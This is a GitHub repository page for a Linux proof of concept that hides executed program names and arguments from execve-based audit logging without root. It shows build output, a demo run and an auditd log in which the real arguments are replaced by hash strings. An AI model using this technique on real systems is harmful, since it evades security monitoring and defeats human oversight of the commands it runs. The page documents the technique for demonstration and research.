GitHub - QAX-A-Team/ptrace: a PoC for Linux to get around agents that log commands being executed, without root privilege. Linux低权限模糊化执行的程序名和参数，避开基于execve系统调用监控的命令日志

QAX-A-Team / ptrace Public

Notifications You must be signed in to change notification settings
Fork 39
Star 240

a PoC for Linux to get around agents that log commands being executed, without root privilege. Linux低权限模糊化执行的程序名和参数，避开基于execve系统调用监控的命令日志

240 stars 39 forks Branches Tags Activity

Star

Notifications

Branches Tags

Name		Name	Last commit message	Last commit date
Latest commit History 7 Commits
libptrace		libptrace
1.c		1.c
Makefile		Makefile
README		README
anonyexec.c		anonyexec.c
anonyexec.h		anonyexec.h
common.h		common.h
elfreader.c		elfreader.c
elfreader.h		elfreader.h
ptrace.c		ptrace.c
ptrace.h		ptrace.h

Repository files navigation

a PoC for Linux to get around agents that log commands being executed, without root privilege.

Linux低权限模糊化执行的程序名和参数，避开基于execve系统调用监控的命令日志
程序仅作原理演示使用

ylbhz@hk:~/work/c/ptrace$ gcc --version
gcc (Ubuntu 5.4.0-6ubuntu1~16.04.10) 5.4.0 20160609

ylbhz@hk:~/work/c/ptrace$ make
gcc -Wall -c ptrace.c -o ptrace.o
gcc -Wall -c anonyexec.c -o anonyexec.o
gcc -o ptrace ptrace.o anonyexec.o elfreader.o 

ylbhz@hk:~/work/c/ptrace$ ./ptrace 
child pid = 3763
EIP: _start 4049a0 
RSP: 7ffc4f394e60
RSP + 8 => RDX(char **ubp_av) to __libc_start_main
argc: 3
src: ubp_av[1]: 3abb6677��@
dst: upb_av[1]: -a
src: ubp_av[2]: 3abb6677��@
dst: upb_av[2]: -l
ylbhz@hk:~/work/c/ptrace$ total 76
drwxrwxr-x  2 ylbhz ylbhz  4096 Jan  7 10:34 .
drwx------ 16 ylbhz ylbhz  4096 Dec 29 15:08 ..
-rw-rw-r--  1 ylbhz ylbhz   349 Jan  3 18:39 Makefile
-rw-rw-r--  1 ylbhz ylbhz     1 Jan  7 10:31 README
-rw-rw-r--  1 ylbhz ylbhz   681 Jan  3 18:24 anonyexec.c
-rw-rw-r--  1 ylbhz ylbhz   226 Jan  3 17:59 anonyexec.h
-rw-rw-r--  1 ylbhz ylbhz  2680 Jan  7 10:34 anonyexec.o
-rw-rw-r--  1 ylbhz ylbhz   527 Jan  3 18:05 common.h
-rw-rw-r--  1 ylbhz ylbhz   230 Jan  3 19:00 elfreader.c
-rw-rw-r--  1 ylbhz ylbhz   142 Jan  3 18:59 elfreader.h
-rw-rw-r--  1 ylbhz ylbhz  1656 Jan  3 19:00 elfreader.o
-rwxrwxr-x  1 ylbhz ylbhz 13992 Jan  7 10:34 ptrace
-rw-rw-r--  1 ylbhz ylbhz  2123 Jan  4 11:24 ptrace.c
-rw-rw-r--  1 ylbhz ylbhz   328 Jan  4 10:38 ptrace.h
-rw-rw-r--  1 ylbhz ylbhz  4768 Jan  7 10:34 ptrace.o


================= AUDITD execve test =========================
type=PATH msg=audit(1546831731.460:100): item=0 name="./ptrace" inode=11017404 dev=08:06 mode=0100775 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
type=PATH msg=audit(1546831731.460:100): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=1835390 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
type=PROCTITLE msg=audit(1546831731.460:100): proctitle="./ptrace"
type=SYSCALL msg=audit(1546831731.464:101): arch=c000003e syscall=59 success=yes exit=0 a0=7ffd846ee3d0 a1=7ffd846ee660 a2=0 a3=598 items=2 ppid=7971 pid=7972 auid=4294967295 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts4 ses=4294967295 comm="3" exe=2F6D656D66643A656C66202864656C6574656429 key="rule01_exec"
type=EXECVE msg=audit(1546831731.464:101): argc=3 a0="/proc/self/fd/3" a1="3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686" a2="3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686"